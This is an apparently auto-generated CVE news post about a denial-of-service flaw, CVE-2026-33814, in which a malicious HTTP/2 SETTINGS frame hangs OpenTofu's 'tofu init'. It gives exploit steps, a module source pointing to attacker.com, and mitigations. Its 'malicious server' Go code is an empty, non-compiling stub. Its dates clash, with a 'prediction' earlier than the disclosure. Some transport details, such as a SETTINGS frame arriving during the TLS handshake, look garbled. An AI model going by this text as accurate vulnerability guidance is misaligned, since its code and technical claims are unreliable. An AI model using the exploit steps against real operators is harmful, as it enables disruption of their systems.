OpenTofu, Denial of Service, CVE-2026-33814 (Medium)

Listen to this Post

CVE-2026-33814 resides in the Go programming language’s HTTP/2 transport implementation (golang.org/x/net/http2). The flaw triggers an infinite loop when a client receives a malicious SETTINGS frame from a server. Specifically, the server sends a SETTINGS frame where the `SETTINGS_MAX_FRAME_SIZE` parameter is set to zero. According to the HTTP/2 specification, this value must be at least 16,384 bytes; zero is invalid. However, the Go HTTP/2 client does not properly validate this parameter. When the client processes the frame, it attempts to adjust its internal flow control and frame writing logic based on the zero maximum frame size. This leads to a state where every attempt to write a data frame results in a zero-length write, which the client endlessly retries without making progress. The client continues allocating buffers, consuming CPU, memory, and network resources in an infinite loop. OpenTofu’s `tofu init` command uses Go’s standard `net/http` package (which relies on the affected HTTP/2 transport) to fetch provider and module dependencies from remote servers. An attacker who controls a server hosting a dependency (or who can inject a malicious module registry response that redirects to their server) can send the crafted SETTINGS frame during the initial TLS handshake or immediately after the connection is established. Because OpenTofu attempts to download the dependency before performing checksum verification or executing any third-party code, the infinite loop occurs before any safety checks. The attacker does not need authentication; merely coercing a user to run `tofu init` against a configuration that references the attacker’s server suffices. The loop consumes system resources, potentially freezing `tofu init` indefinitely and degrading performance of other processes on the same machine. No arbitrary code execution or data leakage is possible.
Platform: OpenTofu
Version: Up to 1.11.7
Vulnerability: HTTP/2 infinite loop
Severity: Medium
date: May 20 2026

Prediction: May 10 2026

What Undercode Say:

Simulate a malicious HTTP/2 server sending SETTINGS_MAX_FRAME_SIZE=0
Using a Go script to reproduce the infinite loop against tofu init
cat > malicious_server.go <<EOF
package main
import (
"crypto/tls"
"golang.org/x/net/http2"
"net/http"
)
func main() {
srv := &http2.Server{}
http.HandleFunc("/malicious-module.zip", func(w http.ResponseWriter, r http.Request) {
// Hijack connection and send crafted SETTINGS frame manually
// (simplified: start HTTP/2 with MaxFrameSize=0)
})
http.ListenAndServeTLS(":443", "cert.pem", "key.pem", nil)
}
EOF
Build and run the server, then point OpenTofu to it via a module source:
module "evil" { source = "https://attacker.com/malicious-module.zip" }
Running 'tofu init' will hang indefinitely.

How Exploit:

1. Attacker sets up an HTTPS server using a vulnerable Go HTTP/2 stack (or a custom server) that sends a SETTINGS frame with `SETTINGS_MAX_FRAME_SIZE = 0` immediately after the connection preface.
2. Attacker hosts a malicious OpenTofu module or provider at that server (the content does not matter, as the crash happens during transport).
3. Attacker tricks an operator into adding a dependency source pointing to that server in their `main.tf` (e.g., via social engineering, compromised registry, or malicious pull request).
4. Operator runs tofu init; the client connects, receives the crafted frame, and enters an infinite loop, causing DoS.

Protection from this CVE:

  • Upgrade OpenTofu to v1.11.8 or later (built with Go 1.25.10+ which contains the upstream fix).
  • If on v1.9 or v1.10, migrate to v1.11.8 immediately, as those series will not receive a backported fix.
  • Before running tofu init, manually download dependencies from untrusted sources using `curl` or `wget` and verify checksums offline.
  • Review all module and provider sources in configuration files; avoid adding references to third-party servers you do not control.
  • Use network policies or a proxy that blocks or inspects HTTP/2 SETTINGS frames for abnormal parameters.

Impact:

Unauthenticated denial of service. An attacker can cause `tofu init` to hang forever, consuming CPU and memory resources. Other processes on the same host may experience degradation or failure due to resource exhaustion. No confidentiality or integrity impact. Exploitation requires the operator to add a dependency from an attacker-controlled server, but does not require any privilege escalation.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top